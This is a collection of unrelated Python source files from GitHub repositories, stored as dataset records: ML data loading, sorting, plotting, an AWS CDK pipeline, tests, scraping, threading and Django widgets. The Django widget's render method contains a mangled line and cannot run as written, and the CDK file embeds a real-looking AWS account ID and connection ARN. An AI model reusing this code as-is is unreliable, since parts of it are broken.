+{"seq_id":"26177466821","text":"import os\nfrom typing import Tuple\n\nimport pandas as pd\nfrom PIL import Image\nfrom torch import Tensor\nfrom torch.utils.data import Dataset, WeightedRandomSampler\nfrom torchvision.transforms import (\n ToTensor,\n Normalize,\n RandomHorizontalFlip,\n RandomVerticalFlip,\n)\nimport torch\n\n\ndef get_class_weights(n_samples, class_counts, unique_classes):\n class_weights = [1 - class_counts[cl] / n_samples for cl in unique_classes]\n class_weights = torch.tensor(\n class_weights,\n device=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n dtype=torch.float32,\n )\n return class_weights\n\n\nclass PatchDataset(Dataset):\n def __init__(\n self,\n df: pd.DataFrame,\n transform=Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n augmentation=True,\n ) -> None:\n self.labels = df[\"class\"].to_numpy()\n unique_classes = sorted(df[\"class\"].unique())\n self.class_map = {cl: i for i, cl in enumerate(unique_classes)}\n self.img_paths = df[\"path\"].to_numpy()\n\n class_counts = df[\"class\"].value_counts()\n class_weights = {cl: 1 / class_counts[cl] for cl in unique_classes}\n sample_weights = [class_weights[cl] for cl in self.labels]\n\n self.weighted_sampler = WeightedRandomSampler(\n sample_weights, num_samples=len(self.img_paths)\n )\n\n self.transform = transform\n\n if augmentation:\n self.augmentation = torch.nn.Sequential(\n RandomVerticalFlip(0.5), RandomHorizontalFlip(0.5)\n )\n else:\n self.augmentation = None\n\n def __len__(self):\n return len(self.img_paths)\n\n def __getitem__(self, idx) -> Tuple[Tensor, int]:\n\n img_path = self.img_paths[idx]\n\n image = Image.open(img_path)\n image = ToTensor()(image)\n assert image.shape == torch.Size([3, 224, 224])\n if self.transform:\n image = self.transform(image)\n\n if self.augmentation:\n image = self.augmentation(image)\n\n label = self.labels[idx]\n\n return image, self.class_map[label]\n","repo_name":"fekstr/ds-lab","sub_path":"src/patch_dataset.py","file_name":"patch_dataset.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
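The weighting scheme PatchDataset builds can be seen in isolation: each sample is weighted by the inverse frequency of its class, so the sampler draws classes roughly uniformly despite imbalance. A toy sketch with made-up labels and no images:

from collections import Counter
from torch.utils.data import WeightedRandomSampler

labels = ["a", "a", "a", "b"]                      # imbalanced toy labels
counts = Counter(labels)
sample_weights = [1 / counts[c] for c in labels]   # [1/3, 1/3, 1/3, 1]
sampler = WeightedRandomSampler(sample_weights, num_samples=len(labels))
print(sample_weights, list(sampler))  # index 3 is drawn far more often than its 25% share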
+{"seq_id":"5307088532","text":"# Insertion sort\ndef insertSort(nums):\n    for right in range(1,len(nums)):\n        temp = nums[right]\n        for left in range(right):\n            if nums[right] < nums[left]:\n                # shift nums[left:right] one place right and drop temp into the gap\n                nums[left+1:right+1] = nums[left:right]\n                nums[left] = temp\n                break\n    return nums\n\n\n\n# Swap two elements in place\ndef swap(array,a,b):\n    array[a],array[b] = array[b],array[a]\n\n# Partition around the first element as pivot; returns the pivot's final index\ndef partition(iList,start,end):\n    pivot = iList[start]\n    p = start + 1\n    q = end\n    while p <= q:\n        while p <= q and iList[p] < pivot:\n            p += 1\n        while p <= q and iList[q] >= pivot:\n            q -= 1\n        if p < q:\n            swap(iList,p,q)\n    swap(iList,start,q)\n    return q\n\n# Quicksort over iList[start:end+1] (inclusive bounds)\ndef quickSort(iList,start,end):\n    if start >= end:\n        return\n    mid = partition(iList,start,end)\n    quickSort(iList,start,mid-1)\n    quickSort(iList,mid+1,end)\n    return iList\n\nnum = [5,2,0,1,9,6,4,8]\nprint(quickSort(num,0,len(num)-1))","repo_name":"lxy1997430/data","sub_path":"10.23/复习.py","file_name":"复习.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
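The snippet only exercises quickSort; the insertion sort defined alongside it can be checked the same way on a fresh list:

print(insertSort([5, 2, 0, 1, 9, 6, 4, 8]))  # [0, 1, 2, 4, 5, 6, 8, 9]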
+{"seq_id":"17781772443","text":"\"\"\"InVision - Data visualization.\"\"\"\nimport git\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics import mean_absolute_error\n\n\ndef plot_time_series(\n    data: pd.DataFrame,\n    title: str,\n    save: bool = False,\n    filename: str = \"default\",\n    show: bool = False,\n) -> plt.Figure:\n    \"\"\"Plot time series.\n\n    Args:\n        data (pd.DataFrame): data to be plotted.\n        title (str): title of the figure.\n        save (bool): flag to save the plot.\n        filename (str): filename.\n        show (bool): flag to show the plot.\n\n    Returns:\n        plt.Figure: the figure with the time series.\n    \"\"\"\n    figure = plt.figure(figsize=(16, 9))\n    plt.plot(data)\n    plt.title(title)\n    plt.xlabel(\"Time\")\n    plt.grid(True)\n\n    if save:\n        repository: git.repo.base.Repo = git.Repo(\".\", search_parent_directories=True)\n        root: str = repository.working_tree_dir\n        # plt.savefig takes a path, not a Figure, and root lacks a trailing separator;\n        # save via the Figure object instead\n        figure.savefig(root + f\"/plot/{filename}.png\")\n\n    if show:\n        plt.show()\n\n    plt.close()\n\n    return figure\n\n\ndef plot_one_point_prediction(\n    data: pd.DataFrame,\n    title: str,\n    save: bool = False,\n    filename: str = \"default\",\n    show: bool = False,\n) -> plt.Figure:\n    \"\"\"Plot time series.\n\n    Args:\n        data (pd.DataFrame): data to be plotted.\n        title (str): title of the figure.\n        save (bool): flag to save the plot.\n        filename (str): filename.\n        show (bool): flag to show the plot.\n\n    Returns:\n        plt.Figure: the figure with the time series.\n    \"\"\"\n    figure = plt.figure(figsize=(16, 9))\n    plt.plot(data[:-1])\n    plt.plot(data[-1:], \"ro\", markersize=10)\n    plt.title(title)\n    plt.xlabel(\"Time\")\n    plt.grid(True)\n\n    if save:\n        repository: git.repo.base.Repo = git.Repo(\".\", search_parent_directories=True)\n        root: str = repository.working_tree_dir\n        figure.savefig(root + f\"/plot/{filename}.png\")\n\n    if show:\n        plt.show()\n\n    plt.close()\n\n    return figure\n\n\ndef plot_moving_avg_smoothing(\n    original_data: pd.DataFrame,\n    rolling_data: pd.DataFrame,\n    window: int,\n    title: str,\n    scale: float = 1.96,\n    plot_intervals: bool = False,\n    plot_anomalies: bool = False,\n    save: bool = False,\n    filename: str = \"default\",\n    show: bool = False,\n) -> plt.Figure:\n    \"\"\"Plot time series.\n\n    Args:\n        original_data (pd.DataFrame): original data.\n        rolling_data (pd.DataFrame): rolling data.\n        window (int): window used to smooth the time series.\n        title (str): title of the figure.\n        scale (float): scale for the standard deviation to be used.\n        plot_intervals (bool): plot confidence intervals.\n        plot_anomalies (bool): plot anomalies.\n        save (bool): flag to save the plot.\n        filename (str): filename.\n        show (bool): flag to show the plot.\n\n    Returns:\n        plt.Figure: the figure with the time series.\n    \"\"\"\n    figure = plt.figure(figsize=(16, 9))\n    plt.title(title + f\" window size {window}\")\n    plt.xlabel(\"Time\")\n    plt.grid(True)\n\n    plt.plot(rolling_data, \"g\", label=\"Rolling mean trend\")\n    plt.plot(original_data, label=\"Actual values\")\n\n    # Plot confidence intervals for smoothed values\n    if plot_intervals:\n        mean_abs_error = mean_absolute_error(\n            original_data[window:], rolling_data[window:]\n        )\n        deviation = (original_data[window:] - rolling_data[window:]).std()\n        lower_bond = rolling_data - (mean_abs_error + scale * deviation)\n        upper_bond = rolling_data + (mean_abs_error + scale * deviation)\n        plt.plot(upper_bond, \"r--\", label=\"Upper Bond / Lower Bond\")\n        plt.plot(lower_bond, \"r--\")\n\n        # Having the intervals, find abnormal values\n        if plot_anomalies:\n            anomalies = pd.DataFrame(\n                index=original_data.index, columns=original_data.columns\n            )\n            anomalies[original_data < lower_bond] = original_data[\n                original_data < lower_bond\n            ]\n            anomalies[original_data > upper_bond] = original_data[\n                original_data > upper_bond\n            ]\n            plt.plot(anomalies, \"ro\", markersize=10)\n\n    plt.legend(loc=\"upper left\")\n\n    if save:\n        repository: git.repo.base.Repo = git.Repo(\".\", search_parent_directories=True)\n        root: str = repository.working_tree_dir\n        figure.savefig(root + f\"/plot/{filename}.png\")\n\n    if show:\n        plt.show()\n\n    plt.close()\n\n    return figure\n\n\ndef main():\n    \"\"\"Main function of the module.\"\"\"\n    pass\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"juanhenao21/job-application","sub_path":"src/job_application/InVision/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
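The band logic in plot_moving_avg_smoothing, reduced to plain series operations (synthetic data, names ours; note that a large spike also inflates the residual std, so the 1.96-sigma band can mask it):

import pandas as pd

window, scale = 3, 1.96
data = pd.Series([1.0, 1.0, 1.0, 1.0, 10.0, 1.0, 1.0, 1.0])
rolling = data.rolling(window).mean()

residuals = data[window:] - rolling[window:]
band = residuals.abs().mean() + scale * residuals.std()
lower, upper = rolling - band, rolling + band
print(data[(data < lower) | (data > upper)])  # points outside the band, possibly none here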
+{"seq_id":"33059347775","text":"from aws_cdk import (\n Stage,\n Duration,\n Environment,\n Stack,\n pipelines as cdkpipe,\n aws_codepipeline as pipe,\n)\n\nfrom constructs import Construct\nfrom .europe_resources import DeployEuropeStage\nfrom .usa_resources import DeployUSAStage\n\n\n\nclass MainPipeline(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n git_input = cdkpipe.CodePipelineSource.connection(repo_string=\"andreistavarache/aws-cdk-pipeline\",\n branch=\"main\",\n connection_arn=\"arn:aws:codestar-connections:us-east-1:061515210591:connection/2dfb975c-803a-4935-b3b9-f128cacdb419\"\n )\n pipeline = pipe.Pipeline(self, \"Pipeline\",\n pipeline_name=\"testing-pipeline-cdk\",\n cross_account_keys=False)\n synth = cdkpipe.ShellStep(\"Synth\",\n install_commands=[\n 'pip install -r requirements.txt'\n ],\n commands=[\n 'npx cdk synth'\n ],\n input=git_input\n )\n cdk_pipeline = cdkpipe.CodePipeline(self, \"CodePipeline\",\n code_pipeline=pipeline,\n synth=synth,\n self_mutation=True\n )\n deployment_wave = cdk_pipeline.add_wave(\"Deployment-wave\")\n deployment_wave.add_stage(DeployEuropeStage(self, 'DeployEuropeStage',\n env=Environment(account='061515210591', region='eu-west-1')\n ) \n )\n deployment_wave2 = cdk_pipeline.add_wave(\"Deployment-wave2\")\n deployment_wave2.add_stage(DeployUSAStage(self, 'DeployUSAStage',\n env=Environment(account='061515210591', region='us-east-1')\n ) \n )\n","repo_name":"andreistavarache/aws-cdk-pipeline","sub_path":"aws_cdk_pipeline/aws_cdk_pipeline_stack.py","file_name":"aws_cdk_pipeline_stack.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13904390309","text":"# Normal way\nf = open('test2.txt', 'r')\nprint(f.read())\nf.close()\n\n# With a context manager (not actually a comprehension)\nwith open('test2.txt', 'r') as f:\n    print(f.read())\n\n# Normal\na = []\nfor x in range(4):\n    a.append(x+1)\nprint(a)\n\n# Comprehension\na = [x for x in [1, 2, 3, 4]]\nprint(a)\n\n# Normal\nl = []\nfor i in range(1, 10):\n    l.append(i)\nprint(l)\n\n# Comprehension\nk = [i for i in range(1, 10)]\nprint(k)\n\n# More examples\n\nb = [x for x in range(1, 10) if x%2 == 0]\nprint(b)\n\nb = [x if x%2 == 0 else 'un-even' for x in range(1, 10)]\nprint(b)\n\n# Nested Loops\n\nl = []\nfor i in range(3):\n    for j in range(2):\n        l.append((i, j))\nprint(l)\n\nl = [(i,j) for i in range(3) for j in range(2)]\nprint(l)","repo_name":"HolmQ84/PythonExercises","sub_path":"venv/Week 37/List Comprehension.py","file_name":"List Comprehension.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
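One more case in the same spirit as the record above, ours rather than the original author's: flattening a nested list, first with loops, then as a comprehension.

nested = [[1, 2], [3, 4], [5]]

flat = []
for inner in nested:
    for x in inner:
        flat.append(x)
print(flat)

flat = [x for inner in nested for x in inner]
print(flat)  # [1, 2, 3, 4, 5]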
+{"seq_id":"40489767997","text":"\n# procedure for testing:\n# go to root directory and run $ pip install -e .\n# go to tst/ and run pytest\n\n\nimport pytest\nimport PixelSky as pxs\nimport numpy as np\n\ndef test_radial_profile_N():\n    #{{{\n    \"\"\"\n    test_radial_profile(self):\n    test the construction of the partition for the radial\n    profile\n\n    Tasks:\n\n    Args:\n\n    Raises:\n        errors?\n\n    Returns:\n    \"\"\"\n    import astropy.units as u\n\n    rp = pxs.RadialProfile()\n    N = 10\n    rp.set_breaks(unit=u.arcmin, start=0., stop=30., num=N)\n    assert rp.N == (N-1)\n    #}}}\n\ndef test_radial_profile_linspace():\n    #{{{\n    \"\"\"\n    test_radial_profile_linspace(self):\n    test the construction of the partition for the radial\n    profile using the linspace function from the numpy\n    package.\n\n    Tasks:\n\n    Args:\n\n    Raises:\n        errors?\n\n    Returns:\n    \"\"\"\n    import astropy.units as u\n\n    rp = pxs.RadialProfile()\n    N = 10\n    rp.set_breaks(unit=u.arcmin, start=0., stop=30., num=N, endpoint=True)\n    assert rp.N == (N-1)\n    #}}}\n\ndef test_load_config_1():\n    #{{{\n    sys_args = ['python','../set/config_small.ini']\n    filename = pxs.check_file(sys_args)\n    assert isinstance(filename, str)\n\ndef test_load_config_2():\n    #{{{\n    sys_args = ['../set/config_small.ini']\n    with pytest.raises(SystemExit):\n        pxs.check_file(sys_args)\n    \ndef test_load_config_3():\n    #{{{\n    sys_args = ['../set/nonexistentfile.ini']\n    with pytest.raises(SystemExit):\n        pxs.check_file(sys_args)\n\n\n\n    #config = pxs.check_file(['python','../set/config_small.ini']) \n    #with pytest.raises(SystemExit):\n    #    config.load_config()\n    #}}}\n\n#def test_load_config_2():\n#    #{{{\n#    config = pxs.check_file(['python','../set/non_existent_file.ini']) \n#    with pytest.raises(SystemExit):\n#        config.load_config()\n#    #}}}\n# \n#def test_load_config_3():\n#    #{{{\n#    config = pxs.check_file([]) \n#    with pytest.raises(SystemExit):\n#        config.load_config()\n#    #}}}\n# \n#def test_load_config_4():\n#    #{{{\n#    config = pxs.check_file([\"hola\", \"file\", \"another\"]) \n#    with pytest.raises(SystemExit):\n#        config.load_config()\n#    #}}}\n# \n#def test_load_config_pars():\n#    #{{{\n#    config = pxs.check_file(['','../set/config_small.ini']) \n#    config.load_config()\n\n    #}}}\n    \n\n\n#\n#def test_radial_profile_average(self):\n#    #{{{\n#    import pandas as pd\n#    import healpy as hp\n#    import numpy as np\n#    from astropy import units as u\n#\n#    import time\n#\n#    # Read CMB temperature map\n#    nside = 512\n#    mapa = pxs.SkyMap(nside)\n#    mask = pxs.SkyMap(nside)\n#\n#    filename = '../dat/lensmap512_10arcmin_y2.fits'\n#    mapa.load(filename, field=(0))\n#    filename = '../dat/lensmask512_10arcmin_y2.fits'\n#    mask.load(filename, field=(0))\n#\n#    # set the map at a fixed value of 1.\n#    value = 1.\n#    mapa.data = mapa.data*0. + value\n#\n#    # Read galaxy catalog\n#    glx_catalog = '../dat/2mrs_1175_done.dat'\n#    glx = pd.read_csv(glx_catalog, delim_whitespace=True, header=9)\n#    # catalog: http://tdc-www.harvard.edu/2mrs/2mrs_readme.html\n#\n#    phi_healpix = glx['RAdeg']*np.pi/180.\n#    theta_healpix = (90. - glx['DECdeg'])*np.pi/180.\n#    glx['vec'] = hp.ang2vec(theta_healpix, phi_healpix).tolist()\n#\n#    # filter galaxy catalog\n#    l = ['A','X','B']\n#    spiral = [any([s in x for s in l]) for x in glx['type']]\n#    edgeon = glx['b/a'] < 0.8\n#    subset = spiral & edgeon\n#    centers = np.array(list(glx.vec[subset]))\n#\n#    rp = pxs.RadialProfile()\n#    rp.set_breaks(unit=u.arcmin, start=0., stop=30., num=5)\n#\n#    res = rp.radialprofile_II(centers, mapa, mask) \n#\n#    rp.signal = np.mean(res, 1)\n#\n#    self.assertEqual(rp.signal, value)\n#    #}}}\n#\n#\n","repo_name":"mlares/CBR_CrossCorr","sub_path":"test/test_IO.py","file_name":"test_IO.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"4245025325","text":"import requests\nfrom bs4 import BeautifulSoup\n\nURL = \"https://web.archive.org/web/20200518073855/https://www.empireonline.com/movies/features/best-movies-2/\"\n\n# Write your code below this line 👇\nresponse = requests.get(URL)\nmovie_webpage = response.text\n\nsoup = BeautifulSoup(movie_webpage, \"html.parser\")\n\ntitles = soup.find_all(name=\"h3\", class_=\"title\")\n\nfor title in titles:\n print(title.string)","repo_name":"BryantLogan/100-days-of-python","sub_path":"Day 45 - Web Scraping/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"31707916","text":"import tensorflow as tf\n\n@tf.function\ndef split_indices(dim_length,sections):\n '''\n Provides indices to split a dim_length size array into several roughly equally sized bins\n\n Inputs:\n -dim_length: int or tf.Constant. Size of the array\n -sections: Number of sections to create\n\n Outputs:\n -section_indices: tf.Tensor of shape (sections,) (Pythonic) indices where each bin should start/end. E.g. for dim_length 229 and sections we get [0 58 115 172 229] so bin 0 should be x[0:58], bin 1 should be [58:115] and so forth.\n '''\n elements_per_section = dim_length // sections\n extras = dim_length % sections\n \n sections_with_extras = tf.expand_dims(elements_per_section+1,0)\n sections_with_extras = tf.tile(sections_with_extras,[extras])\n \n sections_without_extras = tf.expand_dims(elements_per_section,0)\n sections_without_extras = tf.tile(sections_without_extras,[sections-extras])\n \n section_sizes = tf.concat([[0], sections_with_extras,sections_without_extras],0)\n \n return tf.math.cumsum(section_sizes)\n\nif __name__ == '__main__':\n d = tf.constant(229)\n s = tf.constant(4)\n print(split_indices(d,s))\n","repo_name":"aligirayhanozbay/poisson_CNN","sub_path":"poisson_CNN/dataset/utils/split_indices.py","file_name":"split_indices.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"}
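The docstring's example in the record above (229 elements, 4 sections -> [0 58 115 172 229]) can be cross-checked without TensorFlow, since numpy's array_split uses the same bin-size rule:

import numpy as np

pieces = np.array_split(np.arange(229), 4)
print([len(p) for p in pieces])                   # [58, 57, 57, 57]
print(np.cumsum([0] + [len(p) for p in pieces]))  # [  0  58 115 172 229]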
+{"seq_id":"33892747436","text":"from time import sleep\nfrom queue import Queue\nfrom threading import Thread\n\ndef producer(q, n):\n for i in range(n):\n q.put(i)\n sleep(5)\n q.put(None)\n\ndef consumer(q):\n while True:\n print(\"Wait...\")\n item = q.get()\n if item is None:\n break\n\n print(\"Got:\", item)\n\n\nq = Queue()\nThread(target=producer, args=(q,10)).start()\nThread(target=consumer, args=(q,)).start()\n","repo_name":"monarin/divelite","sub_path":"python3/asyncio/just_threads.py","file_name":"just_threads.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
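The record above signals shutdown with a None sentinel; an alternative sketch (ours, not the original author's) pairs q.task_done() with q.join() so the producer side knows when every item has been consumed:

from queue import Queue
from threading import Thread

q = Queue()

def consumer():
    while True:
        print("Got:", q.get())
        q.task_done()

Thread(target=consumer, daemon=True).start()
for i in range(3):
    q.put(i)
q.join()  # returns once every item put has been marked task_done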
+{"seq_id":"8621208781","text":"from itertools import chain\nfrom django import forms\nfrom django.conf import settings\nfrom django.utils.encoding import force_unicode\nfrom django.utils.safestring import mark_safe\nfrom django.utils.html import escape, conditional_escape\nfrom django.forms.utils import flatatt\nfrom tinymce import TinyMCE\n\nfrom djangoplicity.contrib.admin.templatetags import djangoplicity_admin_utils as djau\n\n\n#\n# Setup settings attributes in case they haven't been specified\n#\nclass HierarchicalSelect( forms.Widget ):\n \"\"\"\n A Widget for displaying ForeignKey for a django-mptt model so that the tree structure is\n apparent rather than a normal flat box.\n\n This is more or less a copy of django.newforms.widgets.Select\n \"\"\"\n\n def __init__(self, attrs=None, choices=()):\n super(HierarchicalSelect, self).__init__(attrs)\n # choices can be any iterable, but we may need to render this widget\n # multiple times. Thus, collapse it into a list so it can be consumed\n # more than once.\n self.choices = list(choices)\n\n def render(self, name, value, attrs=None, choices=()):\n if value is None:\n value = ''\n if attrs is None:\n attrs = {}\n final_attrs = self.build_attrs(attrs, {'name': name})\n output = [u'')\n return mark_safe(u'\\n'.join(output))\n\n\nclass AdminRichTextAreaWidget(TinyMCE):\n def use_required_attribute(self, *args):\n return False\n\n\n\nclass RelationForeignKeyRawIdWidget(forms.TextInput):\n \"\"\"\n A Widget for displaying ForeignKeys in the \"raw_id\" interface rather than\n in a